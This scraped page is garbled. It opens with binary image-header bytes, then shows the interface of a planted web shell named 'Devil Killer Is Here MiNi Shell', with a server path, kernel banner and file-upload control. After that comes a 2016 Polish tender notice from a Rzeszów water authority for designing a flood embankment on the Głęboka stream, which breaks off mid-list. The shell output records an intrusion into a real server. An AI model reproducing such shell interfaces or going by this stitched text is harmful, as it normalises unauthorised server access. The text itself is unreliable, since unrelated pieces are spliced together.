JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160927/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160927/314078-N-2016.html

<div class="divRow_xforms"><div>
              Ogłoszenie nr 314078 - 2016
              z dnia 2016-09-27 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Rzeszów: Opracowanie projektów budowlanych i wykonawczych dla zadania pn.: Budowa lewego wału o długości 2163 m na cieku Głęboka (km modelu 3+080-5+040) wraz z uzyskaniem decyzji o pozwoleniu na realizację inwestycji oraz pozwolenia na budowę.<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Podkarpacki Zarząd Melioracji i Urządzeń Wodnych, krajowy numer identyfikacyjny
              , ul.
              ul. Hetmańska 
              9,
              35959  
              Rzeszów, woj.
              podkarpackie, państwo
              , tel.
              178 537 440, e-mail
              umowy@pzmiuw.pl, faks
              178 536 421.
              <br />
              Adres strony internetowej (URL): www.pzmiuw.pl <br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny: Wojewódzka samorządowa jedn. org. nieposiadająca osobowości prawnej (jedn. budżetowa)</div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br />nie dotyczy</div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br />nie dotyczy</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.pzmiuw.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />pisemnie<br />
                Adres:
                <br />Podkarpacki Zarząd Melioracji i Urządzeń Wodnych w Rzeszowie ul. Hetmańska 9, 35-959 Rzeszów</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Opracowanie projektów budowlanych i wykonawczych dla zadania pn.: Budowa lewego wału o długości 2163 m na cieku Głęboka (km modelu 3+080-5+040) wraz z uzyskaniem decyzji o pozwoleniu na realizację inwestycji oraz pozwolenia na budowę.<br /><b>Numer referencyjny: </b>NU.410.173.IM.2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiotem zamówienia jest:
1.	Opracowanie wariantowania lokalizacyjnego i technologicznego w zakresie budowy lewego wału przeciwpowodziowego cieku Głęboka (Jeżówka) oraz wskazanie wariantu wybranego do realizacji.
2.	Opracowanie wariantowania lokalizacyjnego i technologicznego w zakresie regulacji koryta cieku Głęboka (Jeżówka) km modelu 1+600-6+136 oraz regulacji koryta cieku Rudnia km modelu 2+800-5+600.
3.	Opracowanie projektów budowlanych i wykonawczych oddzielnie dla zakresu budowy wału i zakresu regulacji.
4.	Opracowanie niezbędnych projektów budowlanych i wykonawczych dla ewentualnych kolizji z istniejącą infrastrukturą techniczną.
5.	Uzyskanie decyzji o pozwoleniu na realizację inwestycji przeciwpowodziowej dla zakresu budowy wału oraz pozwolenia na budowę dla zakresu regulacji cieku Głęboka (Jeżówka) oraz cieku Rudnia. 

A. STAN ISTNIEJĄCY
Podkarpacki Zarząd Melioracji i Urządzeń Wodnych w Rzeszowie posiada opracowaną w czerwcu 2015 roku Koncepcję regulacji potoku Jeżówka (Głęboka) w celu ochrony obszarów zalewowych położonych w dolinach cieków Jeżówka i Rudnia na terenie gminy Jeżowe i Rudnik nad Sanem (zwaną dalej Koncepcją.), stanowiącą załącznik nr 4 do siwz.
W Koncepcji...  przedstawiono, a następnie przeanalizowano trzy warianty rozwiązań technicznych mających przyczynić się do eliminacji zjawisk powodziowych na terenach zlokalizowanych w dolinach cieków Głęboka (Jeżówka) i Rudnia na terenie gminy Jeżowe i Rudnik nad Sanem. Wariantem preferowanym Koncepcji... jest wariant 3. Wariant 3 swym rozwiązaniem obejmuje lewostronne obwałowanie cieku Głęboka (Jeżówka) oraz odcinkową regulację cieków Głęboka (Jeżówka) i Rudnia.
B. ZAKRES PRZEDMIOTU ZAMÓWIENIA
1. Przedmiotem zamówienia jest wykonanie:
 I. Prac przedprojektowych 
 II. Prac projektowych.
 III. Usług towarzyszących pracom projektowym
 IV. Operatu szacunkowego wyceny nieruchomości gruntowych.
 I. PRACE PRZEDPROJEKTOWE
1.	Wykonanie prac geodezyjno  pomiarowych, w tym:
Zakup lub sporządzenie map sytuacyjno-wysokościowych w zakresie niezbędnym do celów projektowych. 
2.	Wykonanie badań geotechnicznych 
3.	Wykonanie obliczeń hydraulicznych i hydrologicznych,
4.	Opracowanie wariantowania lokalizacyjnego i technologicznego.
4.1 Zakres opracowania
4.2 Wykaz dokumentów, które m. in. należy uwzględnić przy sporządzeniu opracowania:
a.	mapy prezentujące wielkopowierzchniowe formy ochrony przyrody, w tym obszary Natura 2000- geoserwis.gdos.gov.pl/mapy/
b.	literatura przyrodnicza dotycząca rozpatrywanego obszaru lub w razie jej braku wstępna analiza występujących składników przyrody ożywionej i nieożywionej (na podstawie wizji w terenie przeprowadzonej dla każdego wariantu inwestycji na obszarze jej realizacji i w przewidywanym zasięgu jej oddziaływania),
c.	dokumenty strategiczne: mapy prezentujące zagrożenie powodziowe na obszarze administrowanym przez RZGW w Krakowie - www.krakow.rzgw.gov.pl, Master-Plan dla obszaru dorzecza Wisły, Plan gospodarowania wodami na obszarze dorzecza Wisły, http://www.apgw.kzgw.gov.pl/pl/dorzecze-wisly, Plan Zarządzania Ryzykiem Powodziowym - www.powodz.gov.pl),
d.	materiały (gminnych, powiatowych i wojewódzkich) zespołów zarządzania kryzysowego.
5.  W związku z trwającymi na zlecenia Generalnej Dyrekcji Dróg Krajowych i Autostrad w Rzeszowie pracami projektowymi p.n. Koncepcja Programowa budowy drogi S-19 odcinek Nisko węzeł Zapacz (z węzłem)  węzeł Sokołów Młp. Północ (z węzłem) należy przeanalizować wpływ, planowanego do realizacji w ramach w/w koncepcji, obiektu mostowego na rzece Głęboka oraz umocnienia koryta rzeki w rejonie mostu.
6.   Wniosek o wydanie decyzji o środowiskowych uwarunkowaniach 
6.1 Opracowanie przyrodnicze
Opracowanie przyrodnicze winno być sporządzone jako odrębne opracowanie umożliwiające wykonanie raportu o oddziaływaniu przedsięwzięcia na środowisko (niezależnie od stwierdzonej przez organ właściwy do wydania decyzji o środowiskowych uwarunkowaniach konieczności przeprowadzenia oceny oddziaływania na środowisko). 
W skład opracowania przyrodniczego wchodzi:
6.1.1 Inwentaryzacja przyrodnicza
6.1.2 Identyfikacja potencjalnych zagrożeń
6.1.3 Opis działań minimalizujących
6.1.4 Podstawa opracowania (akty prawne, literatura fachowa, etc.)
6.1.5 Załączniki graficzne (mapy, dokumentacja fotograficzna)
        6.2   Raport o oddziaływaniu przedsięwzięcia na środowisko
II.     PRACE PROJEKTOWE
1)	Operat wodnoprawny 
- 3 egz. w wersji papierowej oraz 1 egz. w wersji elektronicznej w formacie uzgodnionym z Zamawiającym, oddzielnie dla zakresu budowy wału i regulacji.
2)	Projekt budowlany 
wraz z towarzyszącymi projektami rozwiązań ewentualnych kolizji z istniejącą infrastrukturą nadziemną i podziemną (zabezpieczenia, przełożenia, rozbiórki, demontaże, podniesienie terenu). Należy przewidzieć ewentualną aktualizację projektu, w zależności od wymagań decyzji środowiskowej.
-po 4 egz. w wersji papierowej oraz po 2 egz. w wersji elektronicznej w formacie uzgodnionym z Zamawiającym, oddzielnie dla zakresu budowy wału, regulacji i ewentualnych kolizji z infrastrukturą techniczną.
3)	Projekt wykonawczy 
wraz z towarzyszącymi projektami rozwiązań ewentualnych kolizji z istniejącą infrastrukturą nadziemną i podziemną (zabezpieczenia, przełożenia, rozbiórki, demontaże, podniesienie terenu), oraz uwzględnieniem lokalizacji dróg dojazdowych dla potrzeb prowadzonych robót.
- po 3 egz. w wersji papierowej oraz po 1 egz. w wersji elektronicznej (dla każdego zakresu i każdej kolizji oddzielny) w formacie uzgodnionym z Zamawiającym, oddzielnie dla zakresu budowy wału, regulacji i ewentualnych kolizji z infrastrukturą techniczną.
4)	Przedmiar robót (dla każdego projektu oddzielnie) - opracowany zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz.U. z 2013r.,  poz. 1129)
- 2 egz. w wersji papierowej oraz 1 egz. w wersji elektronicznej w formacie uzgodnionym z Zamawiającym.
5)	Kosztorys inwestorski szczegółowy (dla każdego projektu oddzielnie) wraz z zestawieniem całkowitych kosztów- opracowany zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz.U. z 2004r., Nr 130, poz. 1389)
- 2 egz. w wersji papierowej oraz 1 egz. w wersji elektronicznej w programie uzgodnionym 
z Zamawiającym (wraz z 2 egz. tabeli elementów scalonych)
6)	Specyfikacja techniczna wykonania i odbioru robót budowlanych- odrębna dla zakresu budowy wału i regulacji, sporządzona zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz.U. z 2013r.,  poz. 1129)
 3 egz. w wersji papierowej oraz 1 egz. w wersji elektronicznej w formacie uzgodnionym
z Zamawiającym.
7)	Projekt zagospodarowania terenu - Inwentaryzacja drzew i krzewów przeznaczonych do wycinki sporządzona zgodnie z Ustawą z dnia 16 kwietnia 2004r. o ochronie przyrody (Dz. U. z 2015 r., poz. 1651 z późn. zm.).
Inwentaryzacja drzew i krzewów przeznaczonych do wycinki powinna zawierać:
	 imię, nazwisko i adres albo nazwę i siedzibę posiadacza nieruchomości,
	 tytuł prawny władania nieruchomością,
	 nazwę gatunku drzewa lub krzewu,
	 obwód pnia drzewa mierzonego na wysokości 130 cm, 
	przeznaczenie terenu, na którym rośnie drzewo lub krzew, 
	 przyczynę i termin zamierzonego usunięcia drzewa lub krzewu, 
	 wielkość powierzchni, z której zostaną usunięte krzewy.
Inwentaryzacja drzew i krzewów przeznaczonych do wycinki powinna być sporządzona na aktualnej mapie ewidencyjnej z zaznaczonym obszarem inwestycji oraz zawierać wykaz właścicieli działek zgodnie z ewidencją gruntów
 4 egz. w wersji papierowej oraz 1 egz. w wersji elektronicznej w formacie uzgodnionym 
z Zamawiającym.
8)	Projekt podziału nieruchomości w formie operatu geodezyjnego podziału,  przedstawiającego podział działek niezbędnych dla wykonania obiektów budowlanych tj. dla ok. 157 działek dla zakresu budowy wału oraz dla 17 działek dla zakresu regulacji (ilość ta została ustalona w sposób orientacyjny i może ulec zmianie; rozliczenie za ten zakres prac nastąpi w oparciu o ryczałtową cenę jednostkową podziału jednej działki podaną w ofercie oraz faktyczną ilość działek przeznaczonych do podziału). 
9)  Uzyskanie umów cywilno-prawnych 
III.      USŁUGI TOWARZYSZĄCE PRACOM PROJEKTOWYM
1.	Uzyskanie ostatecznych decyzji o środowiskowych uwarunkowaniach.
2.	Uzyskanie ostatecznej decyzji o ustaleniu lokalizacji inwestycji celu publicznego.
3.	Uzyskanie ostatecznych decyzji pozwolenia wodnoprawnego.
4.	Uzyskanie ostatecznej decyzji o warunkach prowadzenia działań (o ile będzie wymagana, tj. w przypadku braku konieczności sporządzania raportu o oddziaływaniu przedsięwzięcia na środowisko stwierdzonej przez organ właściwy do wydania decyzji środowiskowej).
5.	Uzyskanie ostatecznej decyzji o pozwoleniu na realizację inwestycji zgodnie ustawą z dnia 8 lipca 2010r. o szczególnych zasadach przygotowania do realizacji inwestycji w zakresie budowli przeciwpowodziowych (t.j. (Dz. U.z 2015r., poz. 966 z późn. zm.)
6.	Uzyskanie ostatecznej decyzji pozwolenia na budowę dla zakresu regulacji cieków.
7.	Uzyskanie innych nie wymienionych decyzji - o ile zajdzie taka potrzeba -  w tym również  pozwoleń/zgłoszeń dla ewentualnych kolizji z infrastrukturą techniczną
IV.  OPERAT SZACUNKOWY WYCENY NIERUCHOMOŚCI GRUNTOWYCH ORAZ SKŁADNIKÓW ROŚLINNYCH I BUDOWLANYCH NA DZIAŁKACH PRZEZNACZONYCH DO WYKUPU
<br /><br /><b>II.5) Główny kod CPV: </b>71322000-1<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 14/12/2019<br /></div><br /><b>II.9) Informacje dodatkowe: </b>Terminy wykonania zamówienia
1) Terminy wykonania zamówienia dla zakresu budowy wału
Rozpoczęcie: z dniem zawarcia umowy
1. Wykonanie prac przedprojektowych 
a) poz. I.1 - I.2 zał. nr 1 do oferty Zakres rzeczowo-finansowy (pkt. II.4) ppkt. B.I.1-2 ogłoszenia)- do 15.12.2016 r.
b) poz. I.3 - I.5 zał. nr 1 do oferty Zakres rzeczowo-finansowy (pkt. II.4) ppkt. B.I.3-6 ogłoszenia)- do 28.02.2017 r.
c) poz. I.6 - I.7 zał. nr 1 do oferty Zakres rzeczowo-finansowy (pkt. II.4) ppkt. B.I.6.1-6.2 ogłoszenia)- do 10.12.2017 r.
2. Wykonanie prac projektowych 
a) poz. II.1  II.8 zał. nr 1 do oferty Zakres rzeczowo-finansowy  (pkt. II.4) ppkt. B.II.1-8 ogłoszenia)- do 30.10.2018 r.				
3. Usługi towarzyszące pracom projektowym:
a) poz. III.1 zał. nr 1 do oferty Zakres rzeczowo-finansowy (pkt. II.4) ppkt. B.III.1 ogłoszenia) - do 30.10.2018 r.
b) poz. III.2  III.3 zał. nr 1 do oferty Zakres rzeczowo-finansowy  (pkt. II.4) ppkt. B.III.3,4,5,7 ogłoszenia)- do 30.11.2019 r.
4. Operat szacunkowy wyceny nieruchomości gruntowych					
a) poz. IV.1  IV.3	 zał. nr 1 do oferty Zakres rzeczowo-finansowy  (pkt. II.4) ppkt. B.IV ogłoszenia)          - do 14.12.2019 r.

2) Terminy wykonania zamówienia dla zakresu regulacji 
Rozpoczęcie: z dniem zawarcia umowy
1. Wykonanie prac przedprojektowych 
a) poz. V.1 - V.2 zał. nr 1 do oferty Zakres rzeczowo-finansowy (pkt. II.4) ppkt. B.I.1-2 ogłoszenia)- do 15.12.2016 r.
b) poz. V.3 - V.5 zał. nr 1 do oferty Zakres rzeczowo-finansowy (pkt. II.4) ppkt. B.I.3-6 ogłoszenia)- do 28.02.2017 r.
c) poz. V.6 - V.7 zał. nr 1 do oferty Zakres rzeczowo-finansowy (pkt. II.4) ppkt. B.I.6.1-6.2 ogłoszenia)- do 10.12.2017 r.
2. Wykonanie prac projektowych 
a) poz. VI.1  VI.8 zał. nr 1 do oferty Zakres rzeczowo-finansowy  (pkt. II.4) ppkt. B.II.1-8 ogłoszenia)- do 30.10.2018 r.				
3. Usługi towarzyszące pracom projektowym:
a) poz. VII.1 zał. nr 1 do oferty Zakres rzeczowo-finansowy  (pkt. II.4) ppkt. B.III.1 ogłoszenia) - do 30.10.2018 r.
b) poz. VII.2  VII.3 zał. nr 1 do oferty Zakres rzeczowo-finansowy  (pkt. II.4) ppkt. B.III.2,3,4,6,7 ogłoszenia)- do 30.11.2019 r.
4. Operat szacunkowy wyceny nieruchomości gruntowych					
a) poz. VIII.1  VIII.3 zał. nr 1 do oferty Zakres rzeczowo-finansowy  (pkt. II.4) ppkt. B.IV ogłoszenia)- do 30.09.2019 r.
</div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                nie dotyczy<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                nie dotyczy<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                1)	Na potwierdzenie spełniania warunku udziału dotyczącego zdolności technicznej lub zawodowej
Wykonawca musi:
A. wykazać wykonanie w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, co najmniej 1 zamówienia polegającego na opracowaniu projektu w dziedzinie gospodarki wodnej, dotyczącego regulacji rzek lub potoków lub budowy lub przebudowy lub rozbudowy obwałowań wraz z ich infrastrukturą towarzyszącą. Łączna długość regulacji lub obwałowań będących przedmiotem wykazywanych projektów (jednego lub kilku) musi wynosić min. 4 km.
Zamówienia te winny być poparte dowodami określającymi, czy usługi zostały wykonane należycie.

W przypadku usług rozliczanych w walutach innych niż Złoty Polski, Zamawiający dokona przeliczenia ich wartości wg średniego kursu wymiany walut ustalonego przez Narodowy Bank Polski na dzień podany, jako termin rozpoczęcia wyliczanych robót budowlanych.

Kwalifikacja na podstawie zał. nr 5 i 6 do oferty.

B. wskazać następujące osoby do uczestniczenia w wykonywaniu zamówienia:
a)	min. 1 osobę do pełnienia funkcji Projektanta z uprawnieniami do pełnienia samodzielnych funkcji technicznych w budownictwie do projektowania w specjalności: inżynieria wodna lub wodno-melioracyjna, konstrukcyjno-inżynieryjna w zakresie budowli hydrotechnicznych lub posiadającą inne odpowiadające ww. tożsame uprawnienia wydane na podstawie przepisów obowiązujących  w czasie wydania uprawnień.
Powyższa osoba winna wykazać się doświadczeniem jako Autor co najmniej 2 projektów 
w dziedzinie gospodarki wodnej, dotyczących regulacji rzek lub potoków lub budowy lub przebudowy lub rozbudowy obwałowań wraz z ich infrastrukturą towarzyszącą.
Doświadczenie należy wykazać poprzez podanie:
- nazwy zamówienia,
- zakresu opracowania ww. zamówienia,
- inwestorów, dla których zostało wykonane ww. zamówienie.
b)	min. 1 osobę z uprawnieniami do wykonywania samodzielnych funkcji w dziedzinie geodezji i kartografii w zakresie:
	geodezyjne pomiary sytuacyjno-wysokościowe, realizacyjne i inwentaryzacyjne,
	rozgraniczanie i podziały nieruchomości (gruntów) oraz sporządzanie dokumentacji do celów prawnych,
c)	min. 1 osobę posiadającą uprawnienia do ustalania warunków geologiczno-inżynierskich na potrzeby zagospodarowania przestrzennego i posadowienia obiektów budowlanych, w tym budownictwa wodnego (kat. VI) lub posiadającą inne odpowiadające ww. tożsame uprawnienia wydane na podstawie przepisów obowiązujących w czasie wydania uprawnień,
d)	min. 1 osobę z uprawnieniami do wykonywania samodzielnych funkcji jako rzeczoznawca majątkowy
e)	w zakresie oceny oddziaływania na środowisko:
